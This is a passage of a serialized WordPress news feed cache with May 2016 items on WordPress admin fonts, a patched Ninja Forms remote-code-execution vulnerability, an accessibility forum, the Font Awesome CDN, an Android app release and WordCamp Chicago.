Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: WordPress 4.6 to Drop Open Sans in the Admin in Favor of System Fonts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54507\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"http://wptavern.com/wordpress-4-6-to-drop-open-sans-in-the-admin-in-favor-of-system-fonts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2130:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/system-fonts-firefox-osx.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/system-fonts-firefox-osx.png?resize=1025%2C450\" alt=\"system-fonts-firefox-osx\" class=\"aligncenter size-full wp-image-54575\" /></a></p>\n<p>WordPress 4.6 will bid farewell to Open Sans in the admin in favor of using system fonts. Open Sans, which loads from Google Fonts as an external resource, has been in use in the admin since 2013.</p>\n<p>“At the time of introduction in 3.8, there were not good system fonts common to all platforms at the time,” WordPress lead developer <a href=\"http://helenhousandi.com/\" target=\"_blank\">Helen Hou-Sandí</a> said in her <a href=\"https://core.trac.wordpress.org/changeset/37361\" target=\"_blank\">commit</a> message. “In the years since, Windows, Android, OS X, iOS, Firefox OS, and various flavors of Linux have all gotten their own (good) system UI fonts.”</p>\n<p>Now that the admin doesn’t have to load fonts from Google, it should feel faster and will provide a better experience for developers who are working offline.</p>\n<p>Dropping Open Sans originated as part of the <a href=\"https://make.wordpress.org/core/features/font-natively/\" target=\"_blank\">Font Natively</a> feature project led by WordPress designer <a href=\"https://mattmiklic.com/\" target=\"_blank\">Matt Miklic</a>, Mark Uraine, and Helen Hou-Sandí. The project page provides screenshots for the WP admin with Open Sans in Firefox on OSX vs the admin with system fonts, but the team noted that they are in need of more screenshots from different environments.</p>\n<p>Anytime that WordPress can shed a third-party dependency while improving the experience in the admin is a win for everyone. The commit comes early in the release cycle in order to get more people testing for misalignments and any other issues. Feel free to report any bugs you experience with the change, as work is still ongoing on the <a href=\"https://core.trac.wordpress.org/ticket/36753\" target=\"_blank\">ticket</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 May 2016 20:50:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: Ninja Forms Update Patches Critical Security Vulnerability\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54556\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://wptavern.com/ninja-forms-update-patches-critical-security-vulnerability\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4325:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/NinjaFormsFeaturedImage.png\"><img class=\"aligncenter size-full wp-image-40019\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/NinjaFormsFeaturedImage.png?resize=840%2C273\" alt=\"Ninja Forms Featured Image\" /></a><a href=\"https://wordpress.org/plugins/ninja-forms/\">Ninja Forms</a>, a popular plugin active on more than 500K websites, released an update 48 hours ago that addresses a critical security vulnerability. Wordfence <a href=\"https://www.wordfence.com/blog/2016/05/ninja-forms-shell-upload-vulnerability-high-risk/\">is reporting</a> that Ninja Forms versions 2.9.36 to 2.9.42 contain multiple security vulnerabilities.</p>\n<p>One of the vulnerabilities allows an attacker to upload and execute code remotely on WordPress sites. The only information needed to exploit the vulnerability is the URL of the target site that’s using a form powered by an affected version of Ninja Forms.</p>\n<p>Kevin Stover, CTO of Ninja Forms, explains to the Tavern how they discovered the vulnerabilities:</p>\n<blockquote><p>About two weeks ago, we were contacted by a security researcher, James Golovich, regarding a file upload issue within Ninja Forms. He demonstrated that it was possible to upload an arbitrary file using some test code that hadn’t been removed during our build process.</p>\n<p>We realised that the test code had accidentally been utilised in other areas of the plugin, and we immediately began working on a fix. While the issue was being patched, we reached out to the devs at the <a href=\"http://wordpress.org/\" target=\"_blank\" rel=\"noreferrer\">WordPress.org</a> repo and began the processes of preparing for auto updating users of the affected versions.</p>\n<p>Once the patch had been tested, we pushed version 2.9.43 and .1 versions of 2.9.36 – 2.9.42. Shortly after, <a href=\"http://wordpress.org/\" target=\"_blank\" rel=\"noreferrer\">WordPress.org</a> began pushing out automatic updates.</p></blockquote>\n<p>As to why there wasn’t a post published immediately on the official <a href=\"https://ninjaforms.com/blog/\">Ninja Forms blog</a> announcing the update, “We didn’t want to go public with the vulnerability until our users had time to update, both to the newest version and the .1 versions,” Stover said.</p>\n<p>“James Golovich’s responsible disclosure gave us time to fix the issue and for our users to update to safe versions before disclosing the vulnerability on his site,” he said. The company has since <a href=\"https://ninjaforms.com/important-security-update-always-hurt-ones-love/\">published a blog post </a>concerning the update.</p>\n<p>Working with the WordPress security team, automatic updates started rolling out on Tuesday, May 3rd. If automatic plugin updates are disabled, you’re highly encouraged to update manually to 2.9.45 as soon as possible. The Ninja Forms team is also working with a number of large webhosts to ensure as many sites as possible are updated.</p>\n<p>Wordfence is not detecting wide-spread exploitation but this could change in the next few days as details of the exploit emerge.</p>\n<p>When it comes to security vulnerabilities, the ability to upload and execute code remotely is about as severe as it gets. Golovich is credited with <a href=\"http://www.pritect.net/blog/ninja-forms-2-9-42-critical-security-vulnerabilities\">responsibly disclosing</a> the vulnerability to the Ninja Forms team. He also provides technical details of each vulnerability, most of which are in the Ninja Forms 3.0 code base.</p>\n<p>According to Golovich, the most vulnerable code is a proof of concept:</p>\n<blockquote><p>The following vulnerable code was, according to Kyle Johnson of the WP Ninjas team ‘not a live feature of Ninja Forms, but was more of a proof of concept for a future free feature.’ Unfortunately, even proof of concept code that is accessible is still vulnerable to attack. This is the most critical vulnerability here because it potentially allows an attacker to execute arbitrary php code on a site.</p></blockquote>\n<p>Users should update as soon as possible as it’s only a matter of time before tools are created that can easily take advantage of the exploit.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 May 2016 20:46:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: WordPress.org Support Forums Adds Accessibility Section\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54472\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"http://wptavern.com/wordpress-org-support-forums-adds-accessibility-section\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3619:\"<p>Earlier this year, the WordPress project made a huge move by <a href=\"http://wptavern.com/wordpress-adopts-accessibility-coding-standards-for-all-new-and-updated-code\">adopting accessibility coding standards</a> for new and updated code. If you’re struggling to meet <a href=\"https://www.w3.org/WAI/intro/wcag\">WCAG 2.0 guidelines</a> in your WordPress projects and need help, check out the new <a href=\"https://wordpress.org/support/forum/accessibility\">Accessibility section</a> in the WordPress.org support forums.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/WPAccessibilitySupport.png\"><img class=\"size-full wp-image-54551\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/WPAccessibilitySupport.png?resize=1025%2C487\" alt=\"WordPress Accessibility Support\" /></a>WordPress Accessibility Support\n<p>Amanda Rush, who helps WordPress developers make their themes and plugins accessible, says the forum is the result of a conversation with a support team member at WordCamp Atlanta.</p>\n<p>“I <span class=\"message_body\">mentioned that part of what makes the job difficult when it comes to making WordPress accessible is stopping during our work to answer occasional questions.<br />\n</span></p>\n<p>“Most of the time the answer is not a quick one, because in the case of screen reader users, you have to first find out how well they can use their tech, how familiar they are with WordPress itself, and if neither of those chances are high, you spend time giving them a crash course in either one or both, and then answer their question,” <span class=\"message_body\">Rush said. </span></p>\n<p>Most of the people on the <a href=\"https://make.wordpress.org/accessibility/\">WordPress Accessibility team</a> are volunteers with full-time jobs which limits their ability to provide one-on-one support. Many of the support queries come through email or direct messages to individuals on the team. The forum enables everyone to participate in the support process.</p>\n<p>“If people ask their questions publicly, I or others not necessarily on the Accessibility Team can answer, and the answers are then public,” Rush said.</p>\n<p>“We have a pattern library on GitHub, which we all contribute to when we have time. But there are all kinds of solutions being passed around on Twitter and spread across other people’s GitHub accounts. So if someone asks a question like that, we can either point to something in specific cases, which is most of them, there’s probably already a specific solution that someone’s built, and we can link to that,” Rush told the Tavern.</p>\n<p>The accessibility support forum also comes with a side benefit, “W<span class=\"message_body\">e don’t have to say no all the time when people ask for support, or what looks like all the time to some people. Everyone can help each other </span><span class=\"message_body\">out and Google has a public resource,” Rush said.<br />\n</span></p>\n<p>The support forum comes at a time where accessibility is an increasingly important part of web development. For example, the European Union <a href=\"http://europa.eu/rapid/press-release_IP-16-1654_en.htm\">recently agreed to new rules</a> that will make public sector websites and apps more accessible.</p>\n<p>If you have any questions related to accessibility, you can post them on the forum. If you have experience and knowledge in the accessibility field, consider answering questions as it’s a great way to contribute to the WordPress project.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 May 2016 20:13:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"WPTavern: Font Awesome CDN Now in Beta, Loads Icons Asynchronously with Automatic Accessibility Best Practices\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54509\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:119:\"http://wptavern.com/font-awesome-cdn-now-in-beta-loads-icons-asynchronously-with-automatic-accessibility-best-practices\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2903:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/font-awesome.png\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/font-awesome.png?resize=1025%2C326\" alt=\"font-awesome\" class=\"aligncenter size-full wp-image-54532\" /></a></p>\n<p><a href=\"https://fortawesome.github.io/Font-Awesome/\" target=\"_blank\">Font Awesome</a>, the open source vector icon collection used by more than 300 plugins on WordPress.org and many free and commercial themes, <a href=\"https://articles.fortawesome.com/announcing-font-awesome-cdn-81773e0b301f#.egol888o7\" target=\"_blank\">announced the beta release of its new CDN</a>. Developers can now add a single line of code to bring the icons and CSS toolkit into their projects.</p>\n<p>The icon files and CSS are hosted by <a href=\"https://www.maxcdn.com/\" target=\"_blank\">MaxCDN</a>, which serves a cached version that loads quickly on websites that use Font Awesome. The CDN uses <a href=\"https://github.com/typekit/webfontloader\" target=\"_blank\">Web Font Loader</a>, which was co-developed by Google and Typekit, to load the icons asynchronously. This also gives developers <a href=\"https://github.com/typekit/webfontloader#events\" target=\"_blank\">CSS and JavaScript events</a> to hook into on loading.</p>\n<p><a href=\"http://wptavern.com/font-awesome-4-6-0-adds-new-accessibility-icons-category\" target=\"_blank\">FontAwesome 4.6 added a new accessibility icon category</a> and the new CDN helps to automate outputting the correct markup. If the icon you’re using has semantic meaning, including an accurate title attribute with the inline icon will trigger Font Awesome’s JS to do the rest.</p>\n<p>Font Awesome requires an email address from those want to use the CDN so it can issue a unique embed code for each. Developers also have the option to register a Font Awesome CDN account to keep track of sites and apps where they are using the icons, and manage multiple embed codes. Once logged in, you can enable or disable auto-accessibility, asynchronous icon loading, easy updates to newer Font Awesome versions, and CSS or JS embed.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/font-awesome-account.png\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/font-awesome-account.png?resize=1025%2C865\" alt=\"font-awesome-account\" class=\"aligncenter size-full wp-image-54543\" /></a></p>\n<p>One of the most convenient reasons to use the CDN is to simplify updates. WordPress plugin and theme developers do not have to bump versions or push any code to use the latest version. Font Awesome version changes can be triggered on an individual basis for each embed code in a developer’s account dashboard. Check out the instructions at <a href=\"https://cdn.fontawesome.com/\" target=\"_blank\">cdn.fontawesome.com</a> to get your project hooked up.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 May 2016 18:09:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"WP Mobile Apps: WordPress for Android: Version 5.3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://apps.wordpress.com/?p=3352\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://apps.wordpress.com/2016/05/05/wordpress-for-android-version-5-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3203:\"<p>Hello WordPress users! <a href=\"https://play.google.com/store/apps/details?id=org.wordpress.android\" target=\"_blank\">Version 5.3 of the WordPress for Android app</a> is now available in the Google Play Store.</p>\n<h1>Account Settings and App Settings</h1>\n<p>We split the old Account Settings into two distinct screens: Account Settings for everything related to your account, and App Settings for everything specific to the App, like the interface language, PIN lock, and Analytics opt-out.</p>\n<p><img class=\"alignnone size-full wp-image-3354\" src=\"https://apps.files.wordpress.com/2016/04/screenshot-2016-04-04_15-43-50-172.png?w=640\" alt=\"screenshot-2016-04-04_15.43.50.172\" /></p>\n<h1>Delete WordPress.com site</h1>\n<p>With 5.3, you can now export your content (posts, pages, and settings) by email and delete your WordPress.com site from the app.</p>\n<p><img class=\"alignnone size-full wp-image-3356\" src=\"https://apps.files.wordpress.com/2016/04/screenshot-2016-04-04_15-45-34-504.png?w=640\" alt=\"screenshot-2016-04-04_15.45.34.504\" /></p>\n<h1>Other Changes</h1>\n<p>Version 5.3 also comes with a few other enhancements:</p>\n<ul>\n<li>New styling of the action bar in the Reader.</li>\n<li>If you made changes to a post, you’ll see a confirmation blink on <strong>Blog Posts</strong> when returning to the <strong>My site</strong> screen.</li>\n<li>Better styling of the Post and Page Preview screen.</li>\n<li>An updated support tool reduces crashes.</li>\n</ul>\n\n<a href=\"https://apps.wordpress.com/2016/05/05/wordpress-for-android-version-5-3/screenshot-2016-04-04_15-59-35-639/\"><img width=\"84\" height=\"150\" src=\"https://apps.files.wordpress.com/2016/04/screenshot-2016-04-04_15-59-35-639.png?w=84&h=150\" class=\"attachment-thumbnail size-thumbnail\" alt=\"screenshot-2016-04-04_15.59.35.639\" /></a>\n<a href=\"https://apps.wordpress.com/2016/05/05/wordpress-for-android-version-5-3/screenshot-2016-04-04_16-01-41-971/\"><img width=\"84\" height=\"150\" src=\"https://apps.files.wordpress.com/2016/04/screenshot-2016-04-04_16-01-41-971.png?w=84&h=150\" class=\"attachment-thumbnail size-thumbnail\" alt=\"screenshot-2016-04-04_16.01.41.971\" /></a>\n\n<p>We’re working hard on new features for the next version — you can track our development progress for the next release by visiting <a href=\"https://github.com/wordpress-mobile/WordPress-Android/milestones/5.4\">our 5.4 milestone on GitHub</a>.</p>\n<h1>Thank you</h1>\n<p>Thanks to our contributors: <a href=\"https://github.com/aforcier\">@aforcier</a>, <a href=\"https://github.com/daniloercoli\">@daniloercoli</a>, <a href=\"https://github.com/hypest\">@hypest</a>, <a href=\"https://github.com/kwonye\">@kwonye</a>, <a href=\"https://github.com/maxme\">@maxme</a>, <a href=\"https://github.com/mzorz\">@mzorz</a>, <a href=\"https://github.com/nbradbury\">@nbradbury</a>, <a href=\"https://github.com/oguzkocer\">@oguzkocer</a>, <a href=\"https://github.com/rishabh7m\">@rishabh7m</a>, <a href=\"https://github.com/roundhill\">@roundhill</a>, and <a href=\"https://github.com/tonyr59h\">@tonyr59h</a>.</p><img alt=\"\" border=\"0\" src=\"https://pixel.wp.com/b.gif?host=apps.wordpress.com&blog=108068616&post=3352&subd=apps&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 May 2016 08:57:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Maxime\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: WPWeekly Episode 233 – Recap of WordCamp Chicago 2016\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=54518&preview_id=54518\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"http://wptavern.com/wpweekly-episode-233-recap-of-wordcamp-chicago-2016\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2903:\"<p>On this episode of WordPress Weekly, I describe my experience attending WordCamp Chicago 2016 this past weekend. Marcus Couch and I then discuss the news of the week including a new tool that helps WordCamp organizers create customized name badges.</p>\n<p>We also have a lengthy discussion on the freemium business model and how it’s affecting users of themes and plugins downloaded from the official directories. Last but not least, we talk about WooCommerce Connect, a new SaaS tool from Automattic that has a tight relationship with Jetpack.</p>\n<h2>Stories Discussed:</h2>\n<p><a href=\"http://wptavern.com/wordcamp-organizers-get-new-tool-for-creating-personalized-wordcamp-badges\">WordCamp Organizers Get New Tool for Creating Personalized WordCamp Badges</a><br />\n<a href=\"http://wptavern.com/wordpress-is-now-100-translated-into-marathi\">WordPress is Now 100% Translated Into Marathi</a><br />\n<a href=\"http://wptavern.com/templatic-hacked-files-and-databases-compromised\">Templatic Hacked, Files and Databases Compromised</a><br />\n<a href=\"http://wptavern.com/wordpress-theme-review-team-votes-on-new-guidelines-to-ban-obtrusive-upselling\">WordPress Theme Review Team Votes on New Guidelines to Ban Obtrusive Upselling</a><br />\n<a href=\"http://wptavern.com/automattic-introduces-woocommerce-connect-hosted-components-for-e-commerce\">Automattic Introduces WooCommerce Connect, Hosted Components for E-Commerce</a></p>\n<h2>Plugins Picked By Marcus:</h2>\n<p><a href=\"https://wordpress.org/plugins/rss-feed-canceller/\">RSS Feed Canceller </a>provides more control over your RSS feed. You can turn it on or off per post and control whether or not a post is excluded from the feed.</p>\n<p><a href=\"https://wordpress.org/plugins/tld-woocommerce-downloadable-product-update-emails/\">TLD WooCommerce Downloadable Product Update Emails</a> is a simple plugin that notifies customers who purchased a downloadable product via email that there’s an update available.</p>\n<p><a href=\"https://wordpress.org/plugins/inline-click-to-tweet/\">Inline Click To Tweet</a> allows authors to highlight text from within the visual editor and make it tweetable by clicking within the post or page.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, May 11th 9:30 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #233:</strong><br />\n</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 May 2016 08:46:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"WPTavern: WordCamp Chicago 2016 Was a Deep Dish of Fun\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54453\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"http://wptavern.com/wordcamp-chicago-2016-was-a-deep-dish-of-fun\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5547:\"<p><a href=\"https://2016.chicago.wordcamp.org/\">WordCamp Chicago 2016</a> was held at University Center in the heart of Chicago, IL, where more than 300 attendees spent the weekend learning about WordPress. The event was organized by Ryan Erwin and a <a href=\"https://2016.chicago.wordcamp.org/organizers/\">team of volunteers. </a></p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/JJJWCChicago2016.jpg\"><img class=\"size-full wp-image-54500\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/JJJWCChicago2016.jpg?resize=1024%2C768\" alt=\"John James Jacoby talking about bbPress and BuddyPress\" /></a>John James Jacoby talking about bbPress and BuddyPress\n<p>Tracks were split up into three separate rooms limiting the amount of background noise during 